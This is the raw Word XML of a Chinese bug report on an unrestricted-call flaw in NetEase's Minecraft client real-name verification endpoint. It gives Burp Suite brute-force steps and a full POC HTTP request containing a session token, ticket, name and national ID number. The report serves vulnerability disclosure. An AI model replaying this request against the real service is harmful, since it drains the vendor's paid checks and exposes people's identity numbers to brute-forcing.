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D4B3" w14:textId="5DAABD6D" w:rsidR="0048671B" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00504B73">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网易我的世界客户端存在不受限制资源调用漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A31EC97" w14:textId="19238B81" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞类型:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB8BC4" w14:textId="0C2A5C34" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00504B73">
        <w:t>service.mkey.163.com/mpay/api/users/realname/verify_by_ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501FEDE3" w14:textId="387B8F93" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞危害:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773FD536" w14:textId="5105A358" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞概述:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6058526A" w14:textId="304315CD" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新用户登入我的世界客户端的时候,需要进行成年人实名认证来抵制未成年人玩游戏,此时我们可以无限制的调用这个接口,无限制的消耗厂商的资源,因厂商非公安机构,所以调用查询身份证的接口是需要消耗钱财的,我们可以无限制的调用这个接口也就可以无限制消耗厂商的财务,并且还可以用来爆破别人的身份证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634A5462" w14:textId="47872939" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27454919" w14:textId="39EA84DC" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开网易我的世界客户端,登入一个新用户,会弹出来实名认证的窗口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7B952" w14:textId="7D7847C6" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7331E47B" wp14:editId="0E62C04F">
            <wp:extent cx="5274310" cy="5290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7629" w14:textId="39CF89F1" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>随便填写一个成年人的身份证,开启burp suite进行数据包截获,并放入爆破模块中,进行无限制资源调用的测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EBC6CD" w14:textId="0B5C32A0" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D7C8FDD" wp14:editId="60F753F1">
            <wp:extent cx="5274310" cy="3260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114" w14:textId="1DC28CFD" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0C9D35" wp14:editId="49675F5F">
            <wp:extent cx="5274310" cy="3452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8B5" w14:textId="044357DB" w:rsidR="00504B73" w:rsidRDefault="00504B73" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为只是测试,我们只将后两位调为payload</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后进行爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E1878" w14:textId="4FD860D6" w:rsidR="00504B73" w:rsidRDefault="003C48FD" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61DA7971" wp14:editId="37338DEC">
            <wp:extent cx="5274310" cy="3968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E43C" w14:textId="28D40274" w:rsidR="003C48FD" w:rsidRDefault="003C48FD" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现可以一直调用这个接口进行爆破,还可以用来爆破别人的身份证,虽然有重名的情况,但是不多,可以通过排除法排除出来,但最大的危害是无限制消耗调用身份证的这个接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686EDCE0" w14:textId="448D960A" w:rsidR="00DD5685" w:rsidRDefault="00DD5685" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且哪怕第一次无限制因为其他原因失效,但是客户端不会直接将身份证信息录入用户信息中,会弹出页面叫玩家是否确认信息,所以可以重新填写,再次利用这个接口无限制的进行调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C1C99D" w14:textId="30B04EED" w:rsidR="00DD5685" w:rsidRDefault="00DD5685" w:rsidP="00504B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D09ECE" wp14:editId="41EF8794">
            <wp:extent cx="5274310" cy="5290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9A47" w14:textId="7B573794" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="00504B73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404E8962" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>POST /mpay/api/users/realname/verify_by_ticket HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF95051" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8AF37D" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>Accept: */*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FABE7DC" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>X-Requested-With: XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EAE0E1" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>Referer: https://service.mkey.163.com/mpay/api/users/realname/guide?app_channel=netease&amp;app_mode=2&amp;app_type=games&amp;arch=win_x32&amp;cv=c3.4.0&amp;device_id=amawfaaaahmpqh3d-d&amp;game_id=aecfrxodyqaaaajp-g-x19&amp;gv=1.8.11.45606&amp;mcount_app_key=EEkEEXLymcNjM42yLY3Bn6AO15aGy4yq&amp;mcount_transaction_id=06024f23-d426-11ec-8cf8-4b696ee8d233-2&amp;process_id=5596&amp;sv=10.0.22000&amp;token=1-eyJzIjogIjBmMDliOTBjMGJkYmQyYzNjMmQ1YmM3NDdmZGE5OGY3ODc3YTYyIiwgImdfaSI6ICJhZWNmcnhvZHlxYWFhYWpwIiwgInQiOiAxfSAg&amp;updater_cv=c1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1D840" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>Accept-Language: zh-Hans-CN,zh-Hans;q=0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2091F827" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9BA80" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A47B2C" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Host: service.mkey.163.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28160314" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>Content-Length: 90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F80E3AA" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAAE2F3" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>Cache-Control: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD15739" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3"/>
    <w:p w14:paraId="5BFC26CB" w14:textId="55C78A7D" w:rsidR="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:r>
        <w:t>realname=%E7%8E%8B%E9%9D%92&amp;id_region=86&amp;id_num=420982198502120052&amp;ticket=AAAAAGmR_IUAH2Pn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6318AF88" w14:textId="77777777" w:rsidR="006D76D3" w:rsidRPr="006D76D3" w:rsidRDefault="006D76D3" w:rsidP="006D76D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006D76D3" w:rsidRPr="006D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10"/>
    <w:rsid w:val="003C48FD"/>
    <w:rsid w:val="0048671B"/>
    <w:rsid w:val="00504B73"/>
    <w:rsid w:val="006D76D3"/>
    <w:rsid w:val="00B01B10"/>
    <w:rsid w:val="00D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0D6C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9C8857FE-23D0-47CA-88CC-EF3BA3C2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B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日向 翔阳</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>日向 翔阳</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-15T08:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-15T08:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>